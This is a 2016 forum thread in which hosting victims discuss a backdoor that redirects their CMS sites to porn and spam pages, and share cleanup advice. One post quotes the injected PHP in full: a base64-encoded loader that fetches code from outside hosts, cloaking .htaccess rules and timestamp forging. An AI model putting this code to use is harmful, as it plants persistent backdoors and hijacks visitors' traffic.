Вирус на хостинге, переброс на порно сайты

[igorfelix]

Добрый день, помогите, сегодня взломали..

на хостинге более 90 сайтов..

при заходе на любой сайт делает редирект на порно сайты.

чишу, снова через минуту.. не хнаю что делать

толи Opencart толи MODX

Змінено 7 листопада 2016 користувачем igorfelix

[jvz]

на сайте более 90 сайтов..

?

[igorfelix]

hri.zip

4bb0a250f62548654e50c3d29c4b6096.zip

d730d81e7o133a51c2bddc5c68874ce.zip

bor.zip

xm1rpc.php

разновидности w84881249n.php

 

в начале index.php дописывает

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      error_reporting(0);ini_set("display_errors", 0);$localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));include_once($root_path."/d730d81e7o133a51c2bddc5c68874ce.zip"); ?>

в конце дописывает

<?php $localpath = getenv("SCRIPT_NAME"); $absolutepath = getenv("SCRIPT_FILENAME"); $root_path = substr($absolutepath, 0, strpos($absolutepath, $localpath)); $xml = $root_path . '/xm1rpc.php'; if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() - filemtime($xml) > 60 * 60 * 1)) { file_put_contents($xml, ___bdec('PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcXVlcnkgPSBpc3NldCgkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ10pPyAkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ106ICcnOyBpZiAoZmFsc2UgIT09IHN0cnBvcygkcXVlcnksICdzaW1wbGVyLXdzJykpIHsgX18xZ2V0X3dzKCk7ICR3c19oYXNoID0gbWQ1KCd3c2EnKTsgJGNhY2hlX2RpciA9IF9fMWdldF9yb290KCk7ICR3c19maWxlID0gJGNhY2hlX2Rpci4nLycuJHdzX2hhc2guJy56aXAnOyByZXF1aXJlKCR3c19maWxlKTsgZGllKCcnKTsgfSBmdW5jdGlvbiBfXzFnZXRfcm9vdCgpIHsgJGxvY2FscGF0aD1nZXRlbnYoIlNDUklQVF9OQU1FIik7JGFic29sdXRlcGF0aD1nZXRlbnYoIlNDUklQVF9GSUxFTkFNRSIpOyRyb290X3BhdGg9c3Vic3RyKCRhYnNvbHV0ZXBhdGgsMCxzdHJwb3MoJGFic29sdXRlcGF0aCwkbG9jYWxwYXRoKSk7IHJldHVybiAkcm9vdF9wYXRoOyB9IGZ1bmN0aW9uIF9fMWdldF93cygpIHsgJGhvc3QgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pPyAkX1NFUlZFUlsnSFRUUF9IT1NUJ106ICcnOyAkd3NfaGFzaCA9IG1kNSgnd3NhJyk7ICRjYWNoZV9kaXIgPSBfXzFnZXRfcm9vdCgpOyAkd3NfZmlsZSA9ICRjYWNoZV9kaXIuJy8nLiR3c19oYXNoLicuemlwJzsgaWYgKCFmaWxlX2V4aXN0cygkd3NfZmlsZSkgfHwgZmlsZV9leGlzdHMoJHdzX2ZpbGUpICYmICh0aW1lKCkgLSBmaWxlbXRpbWUoJHdzX2ZpbGUpID4gNjAqNjAqMjQqMSkpIHsgJHdzID0gX18xZmV0Y2hfdXJsKF9fZ2V0X3JldigpLicmZ2V0X3dzJyk7IGlmICghZW1wdHkoJHdzKSkgZmlsZV9wdXRfY29udGVudHMoJHdzX2ZpbGUsICR3cyk7IH0gZWxzZSB7ICR3cyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR3c19maWxlKTsgfSByZXR1cm4gJHdzOyB9IGZ1bmN0aW9uIF9fZ2V0X3JldigpIHsgcmV0dXJuICdodHRwOi8vYm9rb2luY2hpbmEuY29tL2V4dGFkdWx0Mi5waHA/aG9zdD0nLnRyaW0oc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLCAnLicpLicmZnVsbF91cmw9Jy51cmxlbmNvZGUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7IHJldHVybiAnaHR0cDovL25lemxvYnVkbnlhLmNvbS9nZW5lcmF0ZSc7IH0gZnVuY3Rpb24gX18xZmV0Y2hfdXJsKCR1cmwpIHsgJGNvbnRlbnRzID0gZmFsc2U7ICRlcnJzID0gMDsgd2hpbGUgKCAhJGNvbnRlbnRzICYmICgkZXJycysrIDwgMykgKSB7ICR1c2VyX2FnZW50ID0gJ01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IHJ2OjQwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDAuMSc7IGlmIChpc19jYWxsYWJsZSgnY3VybF9pbml0JykpIHsgJGMgPSBjdXJsX2luaXQoJHVybCk7IGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsgY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VU0VSQUdFTlQsJHVzZXJfYWdlbnQpOyAkY29udGVudHMgPSBjdXJsX2V4ZWMoJGMpOyBpZiAoY3VybF9nZXRpbmZvKCRjLCBDVVJMSU5GT19IVFRQX0NPREUpICE9PSAyMDApICRjb250ZW50cyA9IGZhbHNlOyBjdXJsX2Nsb3NlKCRjKTsgfSBlbHNlIHsgJGFsbG93VXJsRm9wZW4gPSBwcmVnX21hdGNoKCcvMXx5ZXN8b258dHJ1ZS9pJywgaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpOyBpZiAoJGFsbG93VXJsRm9wZW4pIHsgJG9wdGlvbnMgPSBhcnJheSgnaHR0cCcgPT4gYXJyYXkoJ3VzZXJfYWdlbnQnID0+ICR1c2VyX2FnZW50KSk7ICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsgJGNvbnRlbnRzID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwsIGZhbHNlLCAkY29udGV4dCk7IH0gfSB9IHJldHVybiAkY29udGVudHM7IH0KLy8gU2lsZW5jZSBpcyBnb2xkZW4=')); } $htaccess = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>\n\n"; $htaccess_path = $root_path . '/.htaccess'; chmod(dirname($htaccess_path) , 0755); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); touch(dirname($htaccess_path) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); $htaccess_content_original = file_get_contents($htaccess_path); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine on\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = preg_replace("/\n+/", "\n", $htaccess_content_original); if (strpos($htaccess_content_original, trim($htaccess)) === false) { $htaccess_content = $htaccess . "\n" . $htaccess_content_original; file_put_contents($htaccess_path, $htaccess_content); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); touch(dirname($htaccess_path) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); } function ___bdec($input) { $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $output = $output . chr((int)$chr1); if ($enc3 != 64) { $output = $output . chr((int)$chr2); } if ($enc4 != 64) { $output = $output . chr((int)$chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return $output; }

у htacess добавляет

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>

и это еще и не все.очень много мусора в папках

 

редирект идет на сайт http:// ineed2fuck.com

Змінено 7 листопада 2016 користувачем igorfelix

[igorfelix]

?

на хостинге много сайтов, не могу выявить откуда лезет, при удалении вирусов, снова через минуту появляется

[Blondi]

Могу помочь. Пишите в личку

[halfhope]

Аналогично.

Змінено 7 листопада 2016 користувачем halfhope

[igorfelix]

удивляет что у меня у одного что ли такая проблема...

[frolalex]

удивляет что у меня у одного что ли такая проблема...

да нет, не у одного. У меня аналогичная проблема, уже неделю бьюсь и корень вырубить не могу. От редериктов избавится то избавился, но вот от всего остального никак не получается. А у вас какие успехи?

[igorfelix]

я решил сменить хостинг. каждый сайт чищу на компе антвирусом, потом на хостинг закидываю и прогоняю антивирусом scripto_guard.1.2.1 он показывает какие файлы заражены и подозрительные.

только там много функций выдает которые модули используют.

 

короче говоря около 80 сайтов. пока 3 почистил.

помогает еще валерьянка и пустырник. горели бы в аду те твари что эти гадости программируют.

[sitecreator]

И все сайты доступны одному пользователю?

 

Крайне непродуманная тактика, если это так. а это так на 99%, судя по вашей информации.

 

Берите VPS/VDS.  И делайте для каждого сайта отдельного пользователя. Или один пользователь для группы сайтов.

Взломают один сайт, но остальные будут нетронуты.

 

толи MODX

 

был у меня случай взлома данного движка стародавненго выпуска.   В обновленных версиях дыру закрыли.

 

------------

У вас VDS или общий (виртуальный) хостинг?

 

могу помочь.

[igorfelix]

Я обычный хостинг выбрал. Был у меня vps, отказался. Много надо в этом понимать а хостер только платно помогает по vps. Ну теперь раскидаю сайты на разные отдельные аккаунты, модх похоже точно отдельно придеться держать. Да вот странно модх ево я каждый обновил весной, и все равно через него были повторные вирусы, я чистил, но в этот раз это нечто. Вирус пладится каждую минуту, видимо себя запускает и выключает.

[frolalex]

я решил сменить хостинг. каждый сайт чищу на компе антвирусом, потом на хостинг закидываю и прогоняю антивирусом scripto_guard.1.2.1 он показывает какие файлы заражены и подозрительные.

только там много функций выдает которые модули используют.

 

короче говоря около 80 сайтов. пока 3 почистил.

помогает еще валерьянка и пустырник. горели бы в аду те твари что эти гадости программируют.

И не говорите, уже задрало с этим ковырятся. Я вот хочу эту дрянь вычислить и вычистить. Только нужно узнать откуда ноги растут, а не получается. Хотя когда у двоих проблема, теоретически можно найти какие-то пересечения. У меня сайты на Wordpress. Эта дрянь прописывается во корневых директориях сайтов. Появляется файл xm1rpc.php, изменяются index.php и .htaccess. Кроме того появляется вот это чудо 

4bb0a250f62548654e50c3d29c4b6096.zip

d730d81e7o133a51c2bddc5c68874ce.zip

Кроме того, в папке wp-admin подменяется файл index.php, из-за чего в админку нельзя зайти. Также изменяется файл header.php тем Wordpress. Ну и еще заметил, что вышеупомянутые файлы появляются практически во всех папках хостинга. 

[Yoda]

Если у вас много сайтов и оно лезет и лезет, найдите кто поставить вам Suhosin и отключит eval() в php.

Так как 99% зловредов используют примитивную обфускацию, которая без eval ну никак не обходится, сразу вы закрываете львиную долю дыр.

 

Это первый шаг.

Второй - это вот, самое то для WP.

Змінено 9 листопада 2016 користувачем Yoda

[igorfelix]

И не говорите, уже задрало с этим ковырятся. Я вот хочу эту дрянь вычислить и вычистить. Только нужно узнать откуда ноги растут, а не получается. Хотя когда у двоих проблема, теоретически можно найти какие-то пересечения. У меня сайты на Wordpress. Эта дрянь прописывается во корневых директориях сайтов. Появляется файл xm1rpc.php, изменяются index.php и .htaccess. Кроме того появляется вот это чудо

4bb0a250f62548654e50c3d29c4b6096.zip

d730d81e7o133a51c2bddc5c68874ce.zip

Кроме того, в папке wp-admin подменяется файл index.php, из-за чего в админку нельзя зайти. Также изменяется файл header.php тем Wordpress. Ну и еще заметил, что вышеупомянутые файлы появляются практически во всех папках хостинга.

Вот я и нашел товарища по горю. Все что вы написали один в один как у меня. Только у меня сайты на opencart, modx evo и 2 сайта на getsimple. Вчера кидало на порно, сегодня на магазин зарубежный с виагрой. В каждой папке вирус. И в корне хостинга еще файлы. Index.php дописывает еще. А еще и задним числом меняет даты (как мне показалось).

[frolalex]

Вот я и нашел товарища по горю. Все что вы написали один в один как у меня. Только у меня сайты на opencart, modx evo и 2 сайта на getsimple. Вчера кидало на порно, сегодня на магазин зарубежный с виагрой. В каждой папке вирус. И в корне хостинга еще файлы. Index.php дописывает еще. А еще и задним числом меняет даты (как мне показалось).

Это уж точно, только сайтов у меня гораздо меньше, у вас вообще атас. Кстати, заметил, что если сайт поломать, то есть на него не зайти по домену, то файл xm1rpc.php не создается. Что касается редериктов, то я защитил файл .htaccess от перезаписи и в этом плане все норм. Вот статейка на эту тему http://maxtop.org/optimalnyj-htaccess-dlya-wordpress/. А вот ссылочка на сам файл ( https://yadi.sk/d/ploHbLjj7L8Xm ), если нужен. Но его переписать необходимо будет, потому что адаптирован под Wordpress. Еще такой вопрос, у вас есть в корне хостинга папка cl.selector? У меня там два файлика подозрительных нашлись, и я решил их проверить Nod-ом. Он в них разочаровался, сказал, что вирус, и удалил к чертям собачьим. Короче говоря, похоже на то, что нужно шерстить все папки хостинга, а не только public_html. Я сейчас поудаляю свои сайты, подчищу хвосты вируса во всех папках хостинга и посмотрю, как он себя вести будет. Позднее отпишусь.

Змінено 10 листопада 2016 користувачем frolalex

[frolalex]

Если у вас много сайтов и оно лезет и лезет, найдите кто поставить вам Suhosin и отключит eval() в php.

Так как 99% зловредов используют примитивную обфускацию, которая без eval ну никак не обходится, сразу вы закрываете львиную долю дыр.

 

Это первый шаг.

Второй - это вот, самое то для WP.

Спасибо за наводку, посмотрим, что можно сделать.

[igorfelix]

Может кто нибудь напишет здесь хороший htacess для opencart, для базовой защиты. Что б index.php не могли дописывать, htacess не могли менять, и различные sql запросы делать к базе. статью смотрю, но там для wp 

[igorfelix]

А вот похоже написали уже о нашем вирусе. https://blog.sucuri.net/2016/11/xm1rpc-spam-backdoor.html

я так понял я первооткрыватель его.. видимо новинка октября 2016

 

он для joomla и WP.

теперь вообще не понимаю кто покрамсал мои сайты.. один сайт вообще удалили. а другой даже картинки все испортили. в некоторых папках просто кишат

Змінено 10 листопада 2016 користувачем igorfelix

[frolalex]

А вот похоже написали уже о нашем вирусе. https://blog.sucuri.net/2016/11/xm1rpc-spam-backdoor.html

я так понял я первооткрыватель его.. видимо новинка октября 2016

 

он для joomla и WP.

теперь вообще не понимаю кто покрамсал мои сайты.. один сайт вообще удалили. а другой даже картинки все испортили. в некоторых папках просто кишат

а что там с картинками? У меня под конец что-то тоже перестали отображаться миниатюры, а по клику на рабочие вместо изображения в полном формате выходила страница, мол не найдено. Насчет статейки, то она неплоха, объясняет весь ход действий, хотя, в принципе, он уже был понятен. Я сегодня тоталом поискал этот xm1rpc.php и нашелся как раз в load.php. В вашем случае, думается, ничего экстраординарного, просто, наверное, проникает вирус лучше в Wordpress, уязвимостей в нем хватает.

Что касается того, что я говорил ранее, то, в общем, все снес, хостинг почистил от всей этой дряни и оставил только начатый сайт, остальные снес. Как итог, зараза не видна, то есть, нужно вычищать все скрипты и искать уязвимости. В вашем случае, это, похоже, какой-то один сайт, остальные заражены за компанию, так что как почистите вешайте на каждый сайт уникального пользователя и ждите второго пришествия, но только уже не ко всем, а к одному-двум-трем сайтам. 

[igorfelix]

а что там с картинками? У меня под конец что-то тоже перестали отображаться миниатюры, а по клику на рабочие вместо изображения в полном формате выходила страница, мол не найдено. Насчет статейки, то она неплоха, объясняет весь ход действий, хотя, в принципе, он уже был понятен. Я сегодня тоталом поискал этот xm1rpc.php и нашелся как раз в load.php. В вашем случае, думается, ничего экстраординарного, просто, наверное, проникает вирус лучше в Wordpress, уязвимостей в нем хватает.

Что касается того, что я говорил ранее, то, в общем, все снес, хостинг почистил от всей этой дряни и оставил только начатый сайт, остальные снес. Как итог, зараза не видна, то есть, нужно вычищать все скрипты и искать уязвимости. В вашем случае, это, похоже, какой-то один сайт, остальные заражены за компанию, так что как почистите вешайте на каждый сайт уникального пользователя и ждите второго пришествия, но только уже не ко всем, а к одному-двум-трем сайтам. 

перестали отображаться миниатюры

невозможно почистить, куча папок и мусора, пришлось хостера просить бэкап предоставить платно, некоторые сайты так загадило что восстановлению руками не подлежит. 

[frolalex]

перестали отображаться миниатюры

невозможно почистить, куча папок и мусора, пришлось хостера просить бэкап предоставить платно, некоторые сайты так загадило что восстановлению руками не подлежит. 

Печаль беда. Я уже два сайта восстановил, пока полет нормальный. Буду сегодня и все выходные наблюдать  как себя будет вести один из двух сайтов, которые у меня вызывали наибольшие подозрения. Если ничего не влезет опять, то останется, скорее всего, только один, через который все и просочилось. На остальные как-то не грешу, сомневаюсь, что в них дело.